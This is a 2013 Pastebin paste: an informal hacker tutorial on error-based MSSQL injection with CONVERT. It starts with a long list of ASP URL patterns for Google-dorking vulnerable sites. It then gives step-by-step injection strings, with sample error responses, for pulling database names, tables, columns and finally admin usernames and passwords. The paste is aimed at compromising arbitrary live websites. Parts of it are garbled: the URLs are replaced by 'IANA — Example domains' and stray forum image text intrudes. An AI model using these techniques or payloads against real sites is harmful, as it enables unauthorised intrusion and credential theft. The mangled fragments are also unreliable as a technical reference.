API tools faq
paste
Advertisement
Netikerty

Another SQL

Netikerty
Feb 18th, 2013
287
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.49 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. I hope u will enjoy it....
  4.  
  5. Lets start...
  6.  
  7. There are various types of sql injection for MICROSOFT here as follows
  8.  
  9. 1)ODBC Error Message Attack with "CONVERT"
  10. 2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
  11. 3)MSSQL Injection with UNION Attack
  12. 4)MSSQL Injection in Web Services (SOAP Injection)
  13. 5)MSSQL Blind SQL Injection Attack
  14.  
  15. I will be explaining various methods of sqli's in my various tuts..
  16. So for now we will start with easiest methode of sqli with CONVERT
  17.  
  18. STEP 1:
  19. First we need to find a vulnerable site.
  20.  
  21. By adding a single quote (') double quote ("") or a semicolon (DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm to the field under test.
  22.  
  23. eg
  24. IANA — Example domains'
  25. IANA — Example domains
  26.  
  27. It's vulnerable in SQL injection,If the output shows some error like this:
  28.  
  29. [HTTP Response]------------------------------------------------------------------------------
  30. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  31. [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
  32. character string ''.
  33. /news.asp, line 52
  34. [End HTTP Response]-------------------------------------------------------------------------
  35.  
  36. Also error could be something like below
  37.  
  38. Microsoft OLE DB Provider for SQL Server error '80040e14 '
  39. Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
  40. ..../ main_rub.asp, line 4
  41.  
  42. If the errors like above are shown then site could be vulnerable in SQL
  43.  
  44. Also you can find vulnerable site from google dork.
  45.  
  46. eg
  47.  
  48. inurlDuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAmage.asp?id=
  49. inurl:index.asp?sid=
  50.  
  51. Code:
  52. ".asp?bookID="
  53. ".asp?cart="
  54. ".asp?cartID="
  55. ".asp?catalogid="
  56. ".asp?category_list="
  57. ".asp?CategoryID="
  58. ".asp?catID="
  59. ".asp?cid="
  60. ".asp?code_no="
  61. ".asp?code="
  62. ".asp?designer="
  63. ".asp?framecode="
  64. ".asp?id="
  65. ".asp?idcategory="
  66. ".asp?idproduct="
  67. ".asp?intCatalogID="
  68. ".asp?intProdId="
  69. ".asp?item_id="
  70. ".asp?item="
  71. ".asp?itemID="
  72. ".asp?maingroup="
  73. ".asp?misc="
  74. ".asp?newsid="
  75. ".asp?order_id="
  76. ".asp?p="
  77. ".asp?pid="
  78. ".asp?ProdID="
  79. ".asp?product_id="
  80. ".asp?product="
  81. ".asp?productid="
  82. ".asp?showtopic="
  83. ".asp?Sku="
  84. ".asp?storeid="
  85. ".asp?style_id="
  86. ".asp?StyleID="
  87. ".asp?userID="
  88. "about.asp?cartID="
  89. "accinfo.asp?cartId="
  90. "acclogin.asp?cartID="
  91. "add.asp?bookid="
  92. "add_cart.asp?num="
  93. "addcart.asp?"
  94. "addItem.asp"
  95. "add-to-cart.asp?ID="
  96. "addToCart.asp?idProduct="
  97. "addtomylist.asp?ProdId="
  98. "adminEditProductFields.asp?intProdID="
  99. "advSearch_h.asp?idCategory="
  100. "affiliate.asp?ID="
  101. "affiliate-agreement.cfm?storeid="
  102. "affiliates.asp?id="
  103. "ancillary.asp?ID="
  104. "archive.asp?id="
  105. "article.asp?id="
  106. "aspx?PageID"
  107. "basket.asp?id="
  108. "Book.asp?bookID="
  109. "book_list.asp?bookid="
  110. "book_view.asp?bookid="
  111. "BookDetails.asp?ID="
  112. "browse.asp?catid="
  113. "browse_item_details.asp"
  114. "Browse_Item_Details.asp?Store_Id="
  115. "buy.asp?"
  116. "buy.asp?bookid="
  117. "bycategory.asp?id="
  118. "cardinfo.asp?card="
  119. "cart.asp?action="
  120. "cart.asp?cart_id="
  121. "cart.asp?id="
  122. "cart_additem.asp?id="
  123. "cart_validate.asp?id="
  124. "cartadd.asp?id="
  125. "cat.asp?iCat="
  126. "catalog.asp"
  127. "catalog.asp?CatalogID="
  128. "catalog_item.asp?ID="
  129. "catalog_main.asp?catid="
  130. "category.asp"
  131. "category.asp?catid="
  132. "category_list.asp?id="
  133. "categorydisplay.asp?catid="
  134. "checkout.asp?cartid="
  135. "checkout.asp?UserID="
  136. "checkout_confirmed.asp?order_id="
  137. "checkout1.asp?cartid="
  138. "comersus_listCategoriesAndProducts.asp?idCate gory ="
  139. "comersus_optEmailToFriendForm.asp?idProduct="
  140. "comersus_optReviewReadExec.asp?idProduct="
  141. "comersus_viewItem.asp?idProduct="
  142. "comments_form.asp?ID="
  143. "contact.asp?cartId="
  144. "content.asp?id="
  145. "customerService.asp?TextID1="
  146. "default.asp?catID="
  147. "description.asp?bookid="
  148. "details.asp?BookID="
  149. "details.asp?Press_Release_ID="
  150. "details.asp?Product_ID="
  151. "details.asp?Service_ID="
  152. "display_item.asp?id="
  153. "displayproducts.asp"
  154. "downloadTrial.asp?intProdID="
  155. "emailproduct.asp?itemid="
  156. "emailToFriend.asp?idProduct="
  157. "events.asp?ID="
  158. "faq.asp?cartID="
  159. "faq_list.asp?id="
  160. "faqs.asp?id="
  161. "feedback.asp?title="
  162. "freedownload.asp?bookid="
  163. "fullDisplay.asp?item="
  164. "getbook.asp?bookid="
  165. "GetItems.asp?itemid="
  166. "giftDetail.asp?id="
  167. "help.asp?CartId="
  168. "home.asp?id="
  169. "index.asp?cart="
  170. "index.asp?cartID="
  171. "index.asp?ID="
  172. "info.asp?ID="
  173. "item.asp?eid="
  174. "item.asp?item_id="
  175. "item.asp?itemid="
  176. "item.asp?model="
  177. "item.asp?prodtype="
  178. "item.asp?shopcd="
  179. "item_details.asp?catid="
  180. "item_list.asp?maingroup"
  181. "item_show.asp?code_no="
  182. "itemDesc.asp?CartId="
  183. "itemdetail.asp?item="
  184. "itemdetails.asp?catalogid="
  185. "learnmore.asp?cartID="
  186. "links.asp?catid="
  187. "list.asp?bookid="
  188. "List.asp?CatID="
  189. "listcategoriesandproducts.asp?idCategory="
  190. "modline.asp?id="
  191. "myaccount.asp?catid="
  192. "news.asp?id="
  193. "order.asp?BookID="
  194. "order.asp?id="
  195. "order.asp?item_ID="
  196. "OrderForm.asp?Cart="
  197. "page.asp?PartID="
  198. "payment.asp?CartID="
  199. "pdetail.asp?item_id="
  200. "powersearch.asp?CartId="
  201. "price.asp"
  202. "privacy.asp?cartID="
  203. "prodbycat.asp?intCatalogID="
  204. "prodetails.asp?prodid="
  205. "prodlist.asp?catid="
  206. "product.asp?bookID="
  207. "product.asp?intProdID="
  208. "product_info.asp?item_id="
  209. "productDetails.asp?idProduct="
  210. "productDisplay.asp"
  211. "productinfo.asp?item="
  212. "productlist.asp?ViewType=Category&CategoryID= "
  213. "productpage.asp"
  214. "products.asp?ID="
  215. "products.asp?keyword="
  216. "products_category.asp?CategoryID="
  217. "products_detail.asp?CategoryID="
  218. "productsByCategory.asp?intCatalogID="
  219. "prodView.asp?idProduct="
  220. "promo.asp?id="
  221. "promotion.asp?catid="
  222. "pview.asp?Item="
  223. "resellers.asp?idCategory="
  224. "results.asp?cat="
  225. "savecart.asp?CartId="
  226. "search.asp?CartID="
  227. "searchcat.asp?search_id="
  228. "Select_Item.asp?id="
  229. "Services.asp?ID="
  230. "shippinginfo.asp?CartId="
  231. "shop.asp?a="
  232. "shop.asp?action="
  233. "shop.asp?bookid="
  234. "shop.asp?cartID="
  235. "shop_details.asp?prodid="
  236. "shopaddtocart.asp"
  237. "shopaddtocart.asp?catalogid="
  238. "shopbasket.asp?bookid="
  239. "shopbycategory.asp?catid="
  240. "shopcart.asp?title="
  241. "shopcreatorder.asp"
  242. "shopcurrency.asp?cid="
  243. "shopdc.asp?bookid="
  244. "shopdisplaycategories.asp"
  245. "shopdisplayproduct.asp?catalogid="
  246. "shopdisplayproducts.asp"
  247. "shopexd.asp"
  248. "shopexd.asp?catalogid="
  249. "shopping_basket.asp?cartID="
  250. "shopprojectlogin.asp"
  251. "shopquery.asp?catalogid="
  252. "shopremoveitem.asp?cartid="
  253. "shopreviewadd.asp?id="
  254. "shopreviewlist.asp?id="
  255. "ShopSearch.asp?CategoryID="
  256. "shoptellafriend.asp?id="
  257. "shopthanks.asp"
  258. "shopwelcome.asp?title="
  259. "show_item.asp?id="
  260. "show_item_details.asp?item_id="
  261. "showbook.asp?bookid="
  262. "showStore.asp?catID="
  263. "shprodde.asp?SKU="
  264. "specials.asp?id="
  265. "store.asp?id="
  266. "store_bycat.asp?id="
  267. "store_listing.asp?id="
  268. "Store_ViewProducts.asp?Cat="
  269. "store-details.asp?id="
  270. "storefront.asp?id="
  271. "storefronts.asp?title="
  272. "storeitem.asp?item="
  273. "StoreRedirect.asp?ID="
  274. "subcategories.asp?id="
  275. "tek9.asp?"
  276. "template.asp?Action=Item&pid="
  277. "topic.asp?ID="
  278. "tuangou.asp?bookid="
  279. "type.asp?iType="
  280. "updatebasket.asp?bookid="
  281. "updates.asp?ID="
  282. "view.asp?cid="
  283. "view_cart.asp?title="
  284. "view_detail.asp?ID="
  285. "viewcart.asp?CartId="
  286. "viewCart.asp?userID="
  287. "viewCat_h.asp?idCategory="
  288. "viewevent.asp?EventID="
  289. "viewitem.asp?recor="
  290. "viewPrd.asp?idcategory="
  291. "ViewProduct.asp?misc="
  292. "voteList.asp?item_ID="
  293. "whatsnew.asp?idCategory="
  294. "WsAncillary.asp?ID="
  295. "WsPages.asp?ID="
  296. STEP 2:
  297.  
  298. Now we got our vulnerable website.
  299. CONVERT command is used to convert between two data types and when the specific
  300. data cannot convert to another type the error will be returned.
  301.  
  302. Now we start with our assessment by finding MSSQL_Version, DB_name.
  303.  
  304. IANA — Example domains
  305.  
  306. [http response]-------------------------------------
  307. Microsoft OLE DB Provider for SQL Server error '80040e07'
  308.  
  309. Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
  310. (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
  311. Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
  312.  
  313. /includes/templates/header.asp, line 21
  314.  
  315. -----------------------------------------------------------
  316.  
  317. We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)
  318.  
  319. Let's go to enumerate DB_name.
  320.  
  321. IANA — Example domains
  322.  
  323. [http response]--------------------------------------
  324. Microsoft OLE DB Provider for SQL Server error '80040e07'
  325.  
  326. Conversion failed when converting the nvarchar value 'IPC' to data type int.
  327.  
  328. /includes/templates/header.asp, line 21
  329. ------------------------------------------------------------
  330.  
  331. The data base name is IPC.
  332.  
  333. IANA — Example domains
  334.  
  335. [http response]----------------------------------------
  336. Microsoft OLE DB Provider for SQL Server error '80040e07'
  337.  
  338. Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
  339.  
  340. /includes/templates/header.asp, line 21
  341. -------------------------------------------------------------
  342.  
  343. The use operating database is ipcdc....
  344.  
  345. STEP 3:
  346. NOW LETS FIND TABLES IN DATABASE
  347.  
  348. IANA — Example domains e_name+from+information_schema.tables))--
  349.  
  350. "information_schema.tables" stores information about tables in databases and there is a field called "table_name"
  351. which stores names of each table."SELECT TOP 1" will show first table in database.
  352. The result of this request is something like this:
  353.  
  354. [http response]----------------------------------------
  355. Microsoft OLE DB Provider for SQL Server error '80040e07'
  356.  
  357. Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
  358.  
  359. /includes/templates/header.asp, line 21
  360. -------------------------------------------------------------
  361.  
  362. Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
  363. We only put WHERE clause append the query in above request.
  364. IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
  365.  
  366. [http response]----------------------------------------
  367. Microsoft OLE DB Provider for SQL Server error '80040e07'
  368.  
  369. Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
  370.  
  371. /includes/templates/header.asp, line 21
  372. -------------------------------------------------------------
  373.  
  374. Second table 'headerGraphic'
  375. IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
  376.  
  377. [http response]----------------------------------------
  378. Microsoft OLE DB Provider for SQL Server error '80040e07'
  379.  
  380. Conversion failed when converting the nvarchar value 'admin' to data type int.
  381.  
  382. /includes/templates/header.asp, line 21
  383. -------------------------------------------------------------
  384. third table 'admin'
  385.  
  386. Like this you will get each table name from the error.
  387. IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
  388.  
  389. If the query returns something like this.
  390.  
  391. [http response]----------------------------------------
  392. ADODB.Field error '800a0bcd'
  393. Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  394. /page.asp, line 22
  395.  
  396. -----------------------------------------------------------------
  397.  
  398. IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.
  399.  
  400. STEP 4:
  401. Now we are all set.....and we will find columns in admin table
  402.  
  403. We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
  404. but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
  405. IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
  406.  
  407. [http response]----------------------------------------
  408. Microsoft OLE DB Provider for SQL Server error '80040e07'
  409.  
  410. Conversion failed when converting the nvarchar value 'username' to data type int.
  411.  
  412. /includes/templates/header.asp, line 21
  413. -------------------------------------------------------------
  414. IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
  415.  
  416. the response will be
  417. [http response]----------------------------------------
  418. Microsoft OLE DB Provider for SQL Server error '80040e07'
  419.  
  420. Conversion failed when converting the nvarchar value 'passwd' to data type int.
  421.  
  422. /includes/templates/header.asp, line 21
  423. -------------------------------------------------------------
  424. So 2nd column is 'passwd'
  425.  
  426.  
  427. DO THIS LIKE WE DID URL MANIPULATION FOR TABLES....
  428. DONT FORGET TO ADD WHERE CLAUSE.
  429. UNTILL U GET ERROR LIKE THIS
  430. [http response]----------------------------------------
  431. ADODB.Field error '800a0bcd'
  432. Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  433. /page.asp, line 22
  434.  
  435. -----------------------------------------------------------------
  436.  
  437. STEP 5: RETRIEVING USENAME n PASSWORD etc
  438.  
  439. Now lets see what we got from above
  440.  
  441. table_name: 'admin','siteStatus' n 'HeaderGraphic'
  442.  
  443. Here we are interestedin 'admin'.So we found columns fo 'admin'
  444.  
  445. column_name:'username' n 'passwd'
  446.  
  447. LETS do our work now
  448.  
  449. IANA — Example domains name+from+admin))--
  450. You will get first username in terms of error
  451. eg sa_admin
  452. IANA — Example domains wd+from+admin))--
  453.  
  454. You will get passwd.
  455. eg comic123
  456.  
  457.  
  458. So u own .....MSSQL server wid
  459.  
  460. USERNAME: sa_admin
  461. PASSWORD:comic123
  462. [note:
  463. 1) you can use AND/OR both
  464. 2) Dnt forget , (comma) after 'int' in convert()
  465. 3) In error after ' (upper comma) is your table_name of column_name or etc
  466. 4)you can enemerate more usernames n passwords by using 'not' command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!